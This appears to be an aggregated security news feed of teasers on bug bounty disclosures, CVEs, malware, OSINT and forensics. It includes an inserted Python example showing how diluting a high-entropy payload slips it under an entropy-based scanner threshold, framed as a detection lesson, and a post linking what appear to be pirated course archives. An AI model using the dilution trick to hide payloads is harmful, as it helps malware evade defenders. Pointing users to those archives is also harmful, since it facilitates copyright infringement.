    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1630668 - Bounty: $1800
    CVE-2022-32215 - HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1630667 - Bounty: $1800
  • Open

    Vex: Permanently Silence False Positives with Vulnerability EXchange
    Article URL: https://www.lunasec.io/docs/blog/vex-silence-false-positives/ Comments URL: https://news.ycombinator.com/item?id=32198211 Points: 1 # Comments: 0
    Major Security Vulnerability on PrestaShop Websites
    Article URL: https://build.prestashop.com/news/major-security-vulnerability-on-prestashop-websites/ Comments URL: https://news.ycombinator.com/item?id=32196961 Points: 2 # Comments: 1
  • Open

    Sector035’s 2020 OSINT Quiz
    I’m an OSINT newbie, but have been looking for challenges to practice a few of the skills I‘ve developed, and I came across this 18… Continue reading on Medium »
    OSINT: Vulnerable Webcam using SHODAN
    Shodan is one of the most popular and dangerous search engines; it gives you all the information from the banners it pulls from web-enabled… Continue reading on Medium »
    TryHackMe | Searchlight — IMINT Writeup
    TryHackMe’s Searchlight - IMINT room is an easy image-related OSINT room. We are tasked with analyzing images and finding information… Continue reading on Medium »
    War in Ukraine / July 21
    Day 149: The situation at the front has been stabilized. Helped by HIMARS Continue reading on Medium »
    #SwissArms: how to identify Sig Sauer assault rifles with Saudi forces in Yemen’s war
    Preamble Continue reading on Medium »
    Revealing Who Is Behind SPM55
    SPM55 is a threat actor from Indonesia who sells phishing kits, or scampages. It was actually already discussed in a Twitter thread on the 31st… Continue reading on Medium »
  • Open

    New to DFIR. Unable to mount drives in Paladin.
    submitted by /u/Tristanrodz [link] [comments]
    New forensic file format
    Hello all, a while ago I started to design and build a PoC regarding an increase in read/write performance with a new forensic file format. The PoC resulted in the specification of a first, then a second improved version of a new file format for forensic images, "zff", as an alternative to the meanwhile quite outdated EWF, AFF, ... formats. Zff has the potential (depending on the input data) to provide a significant speed increase (see benchmarks at https://github.com/ph0llux/zff). Furthermore, zff offers a massively expanded feature set:
    - physical and logical dumps
    - multiple dumps (both logical and physical) in one container, keeping related evidence together
    - extension of existing containers (with both logical and physical dumps)
    - hashing algorithms used for integrity purposes considered most secure, fast and modern at the moment
    - optional data encryption (even partially, if desired) (for security purposes)
    - optional digital signature of stored data (for authenticity purposes; using a public-private key method)
    - great flexibility when adding descriptions to cases
    - and much more
    The documentation of the file format can be found at https://zff.dev (website is work in progress). I've also written a reference implementation to create, analyze and handle files in zff format. The library is written in Rust and can be found at https://github.com/ph0llux/zff. You can try it out yourself using the tools zffacquire, zffmount and zffanalyze (see the GitHub link). We've tested the tools ourselves, but if you find any errors in the reference library, please open a GitHub issue. submitted by /u/ph0llux [link] [comments]
    Windows honeypots for forensic analysis
    Hi All, Has anyone here used Windows virtual machines or devices as a honeypot(s) to capture malicious activity and artifacts? I'm interested in gathering logs, pcaps, memory and images much like the content published by the dfir report. I'm curious to hear what risks and challenges were faced, as well as what lessons were learnt. Cheers submitted by /u/netw0rknovice [link] [comments]
    Using cloud storage as a forensic collection platform
    Hi CF! I'm engaging with a client who wishes to obtain a number of documents from ~50 different sources. They are cost conscious, and are considering whether they can set up a platform and enable the sources to put files there, including relevant file hashes etc. These sources would be the complainant in this case, and the client would be the lawyer. I'm inclined to go with good old fashioned physical collection using write-blockers et al., but I'm always conscious I might be missing something. Any thoughts, wise people? submitted by /u/smartypantz_ [link] [comments]
  • Open

    Interesting blogs/books about cyber security in large scale and complex infrastructures
    I work for a company that is particularly disorganized, due to a long series of mergers. The whole infrastructure is fragmented, rendering even simple security operations very hard and long to complete. Working in this environment is frustrating, but the worst part is that, with my experience, I really don't have any clue on how to handle such level of complexity. I would like to read some inspiring article that explains how big infrastructures - like in FAANG-like companies - are secured against cyber attacks. Do you know any interesting blog for this purpose? Or books? submitted by /u/subseven93 [link] [comments]
    Need recommendation for studying ISO 27005
    Could you please recommend best studying material for ISO 27005? submitted by /u/OmegaMan-PT [link] [comments]
    Practical uses of MITRE ATT&CK MATRIX
    What are the practical applications of the matrix? The only one I know of and have seen is to use it to identify whether within one's perimeter one can identify and block any TTPs, but is that the only practical application? What are some other uses? Thanks submitted by /u/woodpmirror [link] [comments]
  • Open

    Defeating Javascript Obfuscation
    submitted by /u/baryoing [link] [comments]
    Confuser - New Dependency Confusion Detection Tool
    submitted by /u/nibblesec [link] [comments]
    A repository of Windows persistence mechanisms
    submitted by /u/CyberMasterV [link] [comments]
    North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    PART 1: How I Met Your Beacon - Overview
    submitted by /u/gid0rah [link] [comments]
  • Open

    I mean, IDOR is NOT only about others ID
    Hi folks! In this write-up, I’m going to talk about the vulnerability I found to broaden your perspective on IDORs. Continue reading on InfoSec Write-ups »
    How I was able to Take over a support chat using leaked Keys
    Hello Everyone.  First, let me introduce myself. I’m Pliskin ( from MGS x) ), I’m an associate systems engineer, CTF player and I do some… Continue reading on Medium »
    Welcome to Hats, Idle Finance.
    Another great team joins the Hats Finance Bounty Program! Welcome Idle Finance, excited to have you onboard. Continue reading on Medium »
    Slavi Announced Bug Bounty Program
    Hello everyone! We are excited to run a global bounty campaign to test our brand-new Slavi Wallet and bring the revolutionary blockchain… Continue reading on Medium »
    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    Entropy is the measure of the randomness in a set of data (here: shellcode). The higher the entropy, the more random the data is. Continue reading on InfoSec Write-ups »
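    An added example (not the article's code) of the statistic the teaser describes: Shannon entropy in bits per byte, the crude threshold rule many scanners apply to it, and what happens to the measurement when a high-entropy blob is interleaved with predictable bytes and then recovered unchanged. The buffers are constructed; a uniform run over all 256 byte values stands in for encrypted or packed data.

```python
"""Shannon entropy of a byte buffer, a threshold classifier over it, and the
effect of diluting a high-entropy blob with predictable filler.  Added
example, not the article's code; the buffers are constructed."""
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(data: bytes, threshold: float = 7.0) -> str:
    """The crude rule a scanner might apply: above the threshold is 'packed/encrypted'."""
    return "high-entropy" if shannon_entropy(data) >= threshold else "low-entropy"


def dilute(blob: bytes, filler: bytes, ratio: int = 3) -> bytes:
    """Follow each blob byte with `ratio` bytes taken in order from `filler`."""
    out = bytearray()
    for i, b in enumerate(blob):
        out.append(b)
        for j in range(ratio):
            out.append(filler[(i * ratio + j) % len(filler)])
    return bytes(out)


def undilute(data: bytes, ratio: int = 3) -> bytes:
    """Recover the original blob: it is every (ratio + 1)-th byte."""
    return data[::ratio + 1]


# Constructed inputs: English text, and a deterministic stand-in for
# encrypted/packed bytes (every byte value equally often, so exactly 8.0 bits).
TEXT = b"The quick brown fox jumps over the lazy dog. " * 20
BLOB = bytes(range(256)) * 4


if __name__ == "__main__":
    samples = (("text", TEXT), ("blob", BLOB), ("diluted blob", dilute(BLOB, TEXT)))
    for name, buf in samples:
        print(f"{name:13s} {shannon_entropy(buf):.3f} bits/byte -> {classify(buf)}")
```

With one payload byte per three filler bytes the mixture cannot exceed about 6.5 bits per byte no matter how random the payload is (a quarter of the bytes carry at most 8 bits, the rest at most the filler's entropy, plus one bit for the mixing), so the blob sails under a 7.0 threshold while `undilute` returns it byte for byte. That is the detection-side lesson: an entropy score is a hint about a buffer, not proof of what a process will do with it.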
    Balancer DoS Bugfix Review
    On May 14th, ChainSecurity employee @k_besic reported a vulnerability classified as “Medium” in Balancer protocol. The vulnerability… Continue reading on Immunefi »
    Bug Bounty
    In 2021 hackers made off with $14 Billion in cryptocurrency, double the 2020 figures of $7 billion. 2022 will be no different. DeFi… Continue reading on Medium »
  • Open

    North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    PART 1: How I Met Your Beacon - Overview - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Show HN: Open API and GraphQL Fuzzing via GitHub Actions
    Schemathesis is a specification-centric API fuzzing tool for Open API and GraphQL-based applications. I've been building the Schemathesis GitHub app for a while and now it is ready to use. You run it as a part of your workflow; then it comes to PRs and adds little reports about API fuzzing results. Folks, I'd appreciate your feedback about the tool or its GitHub integration :) Comments URL: https://news.ycombinator.com/item?id=32193967 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-07-22 Review
    CVE-2019-0808 by SecIN Community; How to shut off a car engine via a GPS tracker by ourren; Visualizing end-to-end log tracing by ourren; A study guide to pre-trained language models for code representation: principles, analysis and code by ourren. For more of the latest articles, visit SecWiki
  • Open

    How Malicious Hackers Can Takeover Your Headless Browser: Part 1
    No content preview
    How Malicious Hackers Can Takeover Your Headless Browser: Part 2
    No content preview
    Don’t let evil hackers abuse this simple Flask/Jinja2 mistake
    No content preview
    Let’s Understand Path Traversal Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    No content preview
    A Lab for Practicing Azure Service Principal Abuse
    No content preview
    TryHackMe — Antivirus
    No content preview
  • Open

    MSA #1 How to Generate & Install a Burpsuite Certificate on the Nox Emulator
    What needs to be prepared: Continue reading on Medium »
    A Lab for Practicing Azure Service Principal Abuse
    Introduction Continue reading on InfoSec Write-ups »
    Being a Blue Team Member in Cyber Security
    Being a Blue Team Member in Cyber Security Continue reading on Bilişim Hareketi »
  • Open

    “Implementation Opinions on Carrying Out Cybersecurity Service Certification Work (Draft for Comment)” released
    The certification rules and certification mark will be formulated and released separately by the State Administration for Market Regulation after soliciting the opinions of the Cyberspace Administration of China and the Ministry of Public Security.
    FreeBuf Morning Report | Threat actors use GoMet to attack Ukraine; Conti breached and encrypted the Costa Rican government
    Conti breached and encrypted the Costa Rican government.
    FreeBuf Weekly | Bandai Namco confirms it was hacked; Albanian government suffers a “massive cyberattack”
    Happy weekend, FreeBufers! Here is this week's “FreeBuf Weekly”!
    Enterprises should narrow the attack-defense gap | Reading the “2022 Enterprise Attack Surface Management” report
    HackerOne has released the “2022 Enterprise Attack Surface Management” report.
    Security management and auditing of system logs | FreeBuf in-house security group topic discussion
    How do you recover system logs that were wiped during an attack? How should log management be done day to day? Is auditing the logs cumbersome?
    Atlassian fixes a critical Confluence vulnerability
    Atlassian has released security updates.
    A Microsoft Teams outage caused Microsoft 365 service disruption
    A recent minor Microsoft Teams glitch brought down multiple Microsoft 365 services integrated with Teams.
    Operation ShadowTiger (Tiger Head Flag): the forest-prowling tiger entrenched on Mount Buram
    In 2019 the QiAnXin Threat Intelligence Center published “Blocking Operation ‘Phantom’: QiAnXin cuts off the claws the Northeast Asian APT group ‘虎木槿’ (Tiger Hibiscus) extended toward important domestic institutions”.
    Google blocked the world's largest computing society (ACM)
    Google Search and Google Drive mistakenly flagged links to the research papers and website of the Association for Computing Machinery (ACM), the world's largest computing society, as malware.
    Hands-on learning: getting a shell via SQL injection
    Hands-on learning of getting a shell through SQL injection; come and try it yourself!
  • Open

    CAD files for a free energy, perpetual motion machine
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Mirrors
    https://mirrors.dtops.cc submitted by /u/ilikemacsalot [link] [comments]
    all the insurance application forms you could ever want
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    CVE Trends – Crowdsourced CVE Intel
    Article URL: https://cvetrends.com/ Comments URL: https://news.ycombinator.com/item?id=32187798 Points: 2 # Comments: 0

  • Open

    Sh*Load exploits: SHA Hardware Offload w/o Error Checking
    submitted by /u/Unique-Enthusiasm-54 [link] [comments]
    Gitlab Project Import RCE Analysis (CVE-2022-2185)
    submitted by /u/CyberMasterV [link] [comments]
    The Return of Candiru: Zero-days in the Middle East
    submitted by /u/stashing_the_smack [link] [comments]
    GitHub - TheOfficialFloW/bd-jb: The first bd-j hack.
    submitted by /u/jeandrew [link] [comments]
    Django web applications with enabled Debug Mode, DB accounts information and API Keys of more than 3,100 applications were exposed on internet.
    submitted by /u/zwrinerlucas [link] [comments]
  • Open

    Would like to learn about malware and how it is implemented
    I'm just about completely new to hacking/cybersecurity-related affairs and would like to learn about malware, mainly Trojan horses and specifically those that plant cryptocurrency miners or perhaps ransomware. How do these work, where can they be found, how are they implemented and is it legal to possess them? If possible, please explain in simple terms. P.S.: I feel like I should add that this is just for fun and to satisfy my curiosity, not for malicious or criminal reasons. Thank you for your help! submitted by /u/Antique__throwaway [link] [comments]
    Is /Browser a legitimate named pipe, and if so, what does it do?
    I see SMB named pipes called “Browser” in traffic, but I can't find any documentation on it. There are a lot of Metasploitable and Conficker related articles about it, but nothing I can find with legitimate uses. \Browser* submitted by /u/Free-Roaming-Orange [link] [comments]
    System information in the URL?
    The SIEM tool flagged a warning for the website, and the URL looked like this. The redacted part looked like a hash. Is there a legitimate use case where such data is passed in the URL? "http://randomwebsite.com/update?os=win&arch=x86&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=103.0.5060.114&lang=hu&acceptformat=crx3&x=%3D1.0.5690.34919%26installsource%3Dnotfromwebstore%26installedby%3Dinternal%26uc" submitted by /u/sec_admin [link] [comments]
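    An added example (not from the post above) that decodes this kind of URL: the query string is a Chrome extension update check (`prod=chromecrx`, `acceptformat=crx3`), and the `x` parameter is a second, percent-encoded query string nested inside the first. The parser unwraps both layers and returns the fields worth a look; the URL is the one quoted in the post with the poster's redaction left in place, and the set of Google update hosts is an assumption used only for the comparison.

```python
"""Decode a Chrome extension update-check URL and pull out the fields an
analyst cares about.  Added example, not from the post; the URL is the one
quoted in the post (redaction kept) and GOOGLE_UPDATE_HOSTS is an assumption."""
from urllib.parse import urlsplit, parse_qsl

SAMPLE_URL = (
    "http://randomwebsite.com/update?os=win&arch=x86&os_arch=x86_64&nacl_arch=x86-64"
    "&prod=chromecrx&prodchannel=&prodversion=103.0.5060.114&lang=hu&acceptformat=crx3"
    "&x=%3D1.0.5690.34919%26installsource%3Dnotfromwebstore%26installedby%3Dinternal%26uc"
)

# Assumption: hosts Chrome itself talks to for Web Store extension updates.
GOOGLE_UPDATE_HOSTS = {"clients2.google.com", "update.googleapis.com"}


def parse_update_check(url: str) -> dict:
    """Return the outer (browser) and inner (extension) fields of the check."""
    parts = urlsplit(url)
    outer = dict(parse_qsl(parts.query, keep_blank_values=True))
    # `x` is itself a percent-encoded query string.  parse_qsl decoded it once
    # above (%3D -> '=', %26 -> '&'), so a second parse splits the inner pairs.
    inner = dict(parse_qsl(outer.get("x", ""), keep_blank_values=True))
    # The first inner pair has an empty key because the poster redacted what
    # came before "=1.0.5690.34919"; an unredacted request normally identifies
    # the extension there.
    install_source = inner.get("installsource", "")
    return {
        "host": parts.hostname,
        "google_host": parts.hostname in GOOGLE_UPDATE_HOSTS,
        "product": outer.get("prod"),
        "chrome_version": outer.get("prodversion"),
        "os": outer.get("os"),
        "arch": outer.get("arch"),
        "extension_version": inner.get(""),
        "install_source": install_source,
        "installed_by": inner.get("installedby", ""),
        "update_check": "uc" in inner,
        "sideloaded": install_source == "notfromwebstore",
    }


if __name__ == "__main__":
    for key, val in parse_update_check(SAMPLE_URL).items():
        print(f"{key:18s} {val}")
```

`installsource=notfromwebstore` says the extension was not installed from the Chrome Web Store. An extension installed that way can name its own `update_url` in its manifest, which is why the check goes to a third-party host instead of Google's; whether that is legitimate comes down to who put the extension on the machine, so the next pivot is the extension id on the host, not the URL.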
  • Open

    Unrecognized file system on FTK imager
    Hoping to get some help here as I am new to computer forensics. I'm trying to analyze a .raw memory capture that is 5 GB in FTK, but it is showing “unrecognized file system” when trying to view the contents. submitted by /u/1rangusN1dangus [link] [comments]
  • Open

    fix(cmd-socketio-server): mitigate cross site scripting attack #2068
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1638984 - Bounty: $100
  • Open

    What is a red team?
    The red team refers to highly expert security professionals who can break into defenses and attack systems. Red teams are independent… Continue reading on Medium »
    GSuite red teaming — Phishing using Google Groups
    As part of a red team operation, I was recently researching how to perform phishing when the target company uses Google Suite instead… Continue reading on System Weakness »
    GSuite red teaming — Phishing using Google Groups
    As part of a red team operation, I was recently researching how to perform phishing when the target company uses Google Suite instead… Continue reading on Medium »
  • Open

    Ultimate Tips And Tricks To Find More Cross-Site Scripting Vulnerabilities
    @bxmbn Continue reading on Medium »
    Reflected Cross Site Scripting (AkamaiGhost) Bypass
    Disclaimer Continue reading on Medium »
    How I Test For Web Cache Vulnerabilities + Tips And Tricks
    @bxmbn Continue reading on Medium »
    Installing Kali Linux as Portable Live USB for Pentesting.
    Hello Amazing People, Continue reading on Medium »
    Android App Pentest #1: Setting Up the Burpsuite Certificate on an Android Emulator
    Burpsuite is a tool that is used very often for penetration testing / bug bounty. Burpsuite is used as an intermediary… Continue reading on Medium »
    HackerOne CTF: Postbook
    I recently published an article on a CTF writeup, an introduction to the HackerOne CTF. You can find that article here. Today I am… Continue reading on Medium »
  • Open

    War in Ukraine / July 20
    Day 148: The logistical “nightmare” of supplying the Ukrainian army Continue reading on Medium »
  • Open

    CVE-2022-23131: Zabbix login bypass vulnerability reproduction
    Reproduction of CVE-2022-23131
    CCSIP 2022 China Cybersecurity Industry Panorama (4th edition) officially released | FreeBuf Consulting
    On July 21, 2022, FreeBuf Consulting, a subsidiary of the domestic security industry portal FreeBuf, officially released the CCSIP 2022 China Cybersecurity Industry Panorama (4th edition).
    FreeBuf Morning Report | Microsoft freezes hiring in its security division; ransomware victims down 34% quarter over quarter in Q2
    Microsoft is cancelling many open positions, including in its Azure cloud business and security software divisions. Microsoft confirmed that the hiring freeze will continue for the near term.
    Introduction and Practice of IoT Endpoint Security: Playing with IoT Firmware (Part 2)
    This article systematically introduces the concepts, techniques, tools and frameworks of endpoint device firmware emulation, as well as the process and tricks of manual firmware emulation.
    Guide to Email Phishing Exercises
    Whether in offense-defense exercises or when facing APT threats, employee security awareness has become the area where enterprises are most exposed.
    Multiple Play Store apps distribute malware
    The Hacker News reports that Google has removed a number of fraudulent apps from the official Play Store.
    Kaspersky warns of incoming Luna ransomware
    Luna can encrypt devices running multiple operating systems, including mainstream ones such as Windows, Linux and ESXi.
    Cyberspace Administration of China steps in: Didi fined 8.026 billion yuan
    The Cyberspace Administration of China has imposed a fine of RMB 8.026 billion on Didi Global Inc. in accordance with the law.
    Cisco fixes bug allowing attackers to execute commands as root
    Cisco has addressed a critical vulnerability in its Cisco Nexus Dashboard data center management solution.
    Gartner's Security Operations Hype Cycle released: where is XDR, now at the peak, headed?
    XDR's rise to the peak has not brought consensus on the view that "XDR will be the key technology of future security operations"; instead it has further sharpened the disagreements.
    Neopets suffers data breach: source code and database stolen
    Virtual pet site Neopets suffered a data breach in which its source code and a database containing personal information of more than 69 million members were stolen.
    WIKI Knowledge Continent @ you: start the co-building journey, "Accept" or "Agree"?
    The "WIKI Knowledge Continent" co-building train has arrived at the station and is waiting for you to board!
    Scammers are exploiting fake YouTube Google search results
    Cybersecurity firm Malwarebytes disclosed scams carried out using fake YouTube Google ad search results.
  • Open

    SecWiki News 2022-07-21 Review
    A brief analysis of JNDI injection by SecIN Community. For more of the latest articles, visit SecWiki
  • Open

    Tag Blending Obfuscation In Property-Based Payloads
    Property-based payloads are payloads based on some particular properties of the document object and the elements. From the document object we already know the location-based payloads and from the elements we have the properties  “innerHTML” and “outerHTML”. Those 3 are very useful to evade a filter or WAF when we get to the point where … Continue reading Tag Blending Obfuscation In Property-Based Payloads The post Tag Blending Obfuscation In Property-Based Payloads appeared first on Brute XSS.
  • Open

    Burp Suite roadmap update: July 2022
    With six (and a bit) months of 2022 already gone, it's time to bring you an update on the latest happenings down at Burp Towers. Find out what we've been up to, and where we're going between now and 2
  • Open

    Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
    The 2022 Unit 42 Network Threat Trends Research Report includes an analysis of the CVEs most commonly exploited in 2021 and predictions for which CVEs attackers will likely focus on in the year to come. The post Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report appeared first on Unit 42.
  • Open

    Valve stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    lots and lots of old flash games
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    HTB-Business CTF
    No content preview
  • Open

    Analysis of cloud sandbox identification techniques based on traffic
    Author: Fengqi. This article is a contribution; Seebug Paper looks forward to your submissions, and every accepted one receives a gift! Submission email: paper@seebug.org Preface Hello everyone, I am Fengqi, and this time I bring traffic-based sandbox identification techniques. As everyone knows, sandbox identification is an old topic; most current detection schemes are done on the sample side, e.g. conventional methods: hardware checks (CPU core count, I/O devices, memory), mouse movement checks, process names, system services, uptime and so on, none of which can...
  • Open

    DOM XSS on ads.tiktok.com
    TikTok disclosed a bug submitted by 0x7: https://hackerone.com/reports/1549451 - Bounty: $2500
    Internal Employee informations Disclosure via TikTok Athena api
    TikTok disclosed a bug submitted by hein_thant: https://hackerone.com/reports/1575560 - Bounty: $1000
    Can access the job name, creator name and can report any draft/under review/rejected job
    LinkedIn disclosed a bug submitted by sachin_kumar_: https://hackerone.com/reports/1581528 - Bounty: $1000
    LFI via Jolokia at https://...:1293
    8x8 disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1641661
  • Open

    TryHackMe | OhSINT Writeup
    TryHackMe’s OhSINT room writeup, from a single photo to finding a person’s password. Continue reading on Medium »
    Where is MDI? — Raw Security Sohbetleri 0x04 (OSINT)
    In this article I will try to explain how we found Mehmet Abi's location with OSINT in the 4th episode of Raw Security Sohbetleri. Continue reading on Medium »
    War in Ukraine / July 19
    Day 147: Ukraine promotes the Kherson direction Continue reading on Medium »
  • Open

    PATH Variable
    Exploiting the PATH variable to gain access to the system by obtaining a shell with maximum privileges. Continue reading on Medium »
    Windows Desktop (Thick) Client Pentesting — DLL Hijacking
    Welcome white hats! Have you ever done thick client pentesting? Have you ever found DLL hijacking in real engagement? I know that it is… Continue reading on Medium »
  • Open

    ZeroTrust Certifications?
    Any zerotrust related security certifications? Thanks in advance. submitted by /u/DisturbedBeaker [link] [comments]
    Good mid-level Incident Response training?
    Good morning, The vast majority of all alerts generated that I have experience with are simple auto-remediated stuff through Microsoft Defender for Endpoint or just easy Q&A type of stuff (like, large volume of data being deleted...look who it is and what it is, ask a question, resolve the alert, etc). I have realized that "true" IR is an area I feel very unprepared for, so my question to the Reddit community is, what are your recommendations on some beneficial mid-level IR training? By mid-level I mean that I won't be doing incredibly detailed stuff like forensics, but I do want to learn a bit of hands-on procedures/methodology and not have it all just be higher level theory/design. Thanks! submitted by /u/ToLayer7AndBeyond [link] [comments]
  • Open

    [Security Bulletin] WebLogic July update fixes multiple high-risk vulnerabilities
    Recently, Oracle released its July 2022 security update, covering 349 vulnerabilities in its products (WebLogic Server, Database Server, Java SE, MySQL, etc.). Among the vulnerabilities fixed this time...
  • Open

    Multiple Vulnerabilities in Atlassian Products
    submitted by /u/sullivanmatt [link] [comments]
    [CVE-2022-34918] A crack in the Linux firewall
    submitted by /u/gquere [link] [comments]
    DNS-over-HTTP/3 in Android
    submitted by /u/SeanPesce [link] [comments]
    Cloud is more fun with an SSRF
    submitted by /u/Ancient_Title_1860 [link] [comments]
    Session On Android – An App Wrapped in Signal
    submitted by /u/jeandrew [link] [comments]
  • Open

    From Stack Trace Laravel Leads to Privilege Escalation [Admin]
    Hi! In this article I will only tell a little about the findings that I think are interesting enough to be used as stories on my medium.com xD Continue reading on Medium »
    Server Side Request Forgery (SSRF) Attacks & How to Prevent / Patch Them #Episode_SSRF1
    A Server-Side Request Forgery (SSRF) attack allows an attacker to make requests to any domain through a vulnerable server… Continue reading on Medium »
    Initial Setup Genymotion & Burpsuite for Android Mobile App Pentest (Bahasa)
    On this occasion I am writing an article about installing Genymotion and Burp Suite, which will be used to perform penetration… Continue reading on Medium »
    Installing Genymotion and the Burp Suite certificate on the Genymotion emulator
    Hello friends, welcome to my first Medium post. In this post I will share a tutorial on how to install… Continue reading on Medium »
    Genymotion Device Installation and Burpsuite Certificate Installation in Genymotion Emulator…
    First, open Genymotion App Continue reading on Medium »
    Maximizing the potential of the “Subfinder”
    Hi guys, in this post I will be sharing about how to maximize the potential of subfinder. So, what is subfinder? and how to use it… Continue reading on Medium »
  • Open

    SecWiki News 2022-07-20 Review
    Some thoughts on security intelligence capabilities and applications by ourren; Exploring and identifying some JSONP honeypots across the Internet by ourren; A winding code audit + penetration + WAF bypass + privilege escalation in practice by ourren; Web3 Development Outlook Research Report by ourren; A new attempt at sample similarity analysis: implemented via audio by Avenger; "Introduction and Practice of IoT Endpoint Security: Understanding IoT Endpoints" Part 2 by ourren; Introduction and Practice of IoT Endpoint Security: Playing with IoT Firmware (Part 2) by ourren; "Introduction and Practice of IoT Endpoint Security: Playing with IoT Firmware" Part 1 by ourren; Introduction and Practice of IoT Endpoint Security: Understanding IoT Endpoints (Part 1) by ourren; On decrypting the X信 database and forensics by ourren. For more of the latest articles, visit SecWiki
  • Open

    More to find in a previous post.
    http://s28.bitdl.ir/ >> Follow your nose and see what you find... http://s28.bitdl.ir/Video/ Good stuff in here. http://s28.bitdl.ir/Compresed/ More good stuff in here... http://s28.bitdl.ir/Compresed/Lynda/ http://s28.bitdl.ir/Compresed/OREILLY/ http://s28.bitdl.ir/Compresed/Udemy/ submitted by /u/klutz50 [link] [comments]
    geometry, topology and comp-sci papers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    How about finding open directories that are nofollow?
    Any good methods for finding nofollow open directories? submitted by /u/G-Streams [link] [comments]
  • Open

    FreeBuf Morning Report | Albanian government suffers "massive cyberattack"; BlackBerry 2022 Threat Report
    The Council of the European Union warned of malicious cyber activity conducted by threat actors against the backdrop of the ongoing conflict between Russia and Ukraine.
    "Douxiang Offense-Defense Exercise Handbook": deploying "cloud honeypots" skillfully
    One article to see clearly the standard, brilliant and clumsy moves of honeypot deployment
    10 "watershed" cybersecurity incidents of the past 10 years
    Security vendor Trustwave listed the 10 most prominent and noteworthy cybersecurity issues and breaches of the past decade.
    Vulnerabilities in well-known GPS tracker could let hackers gain admin privileges
    Vulnerability researchers discovered security issues in the MiCODUS MV720 GPS tracker, which is widely used by Fortune 50 companies, European governments, US states, South American military agencies and nuclear power plant operators, in about 1.5 million vehicles across 169 countries. MiCODUS MV720 user map (BitSight). Six vulnerabilities were found in the MV720 device; a hacker who compromises the device could use it to track or even locate vehicles using it, and could also collect route information through the device and manipulate data. Considering that the
    Frequent upgrades: new ransomware variants keep emerging
    Over the past few weeks, FortiGuard Labs has observed several new ransomware variants.
    New CloudMensis malware deploys backdoor on Mac devices
    The malware supports dozens of commands, including screenshots, document theft and keystroke logging.
    Hacker group "8220" grows cloud botnet to more than 30,000 hosts
    Recently, a cryptomining gang known as the 8220 Gang exploited Linux and cloud application vulnerabilities to expand its botnet to more than 30,000 infected hosts. The group is not technically sophisticated but is strongly financially motivated; it targets publicly exposed systems running vulnerable versions of Docker, Redis, Confluence and Apache, infecting hosts on AWS, Azure, GCP, Aliyun and QCloud. The gang's previous attacks relied on publicly available exploits to compromise Confluence servers. After gaining access
    Abused Slack services: analysis of APT29's attack campaign targeting Italy
    APT29's attack activity dates back to 2008; its main targets include Western government organizations and think tanks.
  • Open

    SANS / GIAC examinations
    Hi there. I’m going to be taking the GCFE exam in a few months which covers SANS FOR500 material. I have not taken the FOR500 course but do have copies of the materials/books. Does anyone know if I will be able to bring these into the exam even though I have not taken the FOR500 course, as it will affect my indexing if not. Thanks. submitted by /u/Individual_Tax_5842 [link] [comments]
  • Open

    File Permissions in Linux
    No content preview
    TryHackMe — Offensive Security
    No content preview
    Paper from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    CVE-2020-8558: accessing 127.0.0.1 across hosts
    Author: leveryd. Original link: https://mp.weixin.qq.com/s/hvb_Kr6DqAPPfnN-lbx1aA Background: Suppose machine A and machine B are on the same LAN and machine A runs nc -l 127.0.0.1 8888; can machine B access a service on machine A that is "bound only to 127.0.0.1"? [root@instance-h9w7mlyv ~]# nc -l 127.0.0.1 8888 &a...
    Research and vulnerability analysis of the Linux kernel nftables subsystem
    Author: Venustech ADLab. Original link: https://mp.weixin.qq.com/s/ILyBUq--PK01TvNF8Vh9KQ 1 Background Recently, the open-source security community oss-security disclosed multiple vulnerabilities related to the Linux kernel netfilter module, all located in the nftables subsystem of netfilter; two of them have existed in the kernel for years, and all can be used for kernel privilege escalation. The vulnerability IDs are CVE-2022-32...
  • Open

    Browser API Fuzzing with Dynamic Mod-Ref Analysis [pdf]
    Article URL: https://nebelwelt.net/files/22FSE.pdf Comments URL: https://news.ycombinator.com/item?id=32161267 Points: 1 # Comments: 0

  • Open

    NiCOFF: COFF and BOF Loader written in Nim
    submitted by /u/DarkGrejuva [link] [comments]
    WINDOWS PASSWORD MINING
    submitted by /u/Clement_Tino [link] [comments]
    Master Student In Need Of Red Teamers
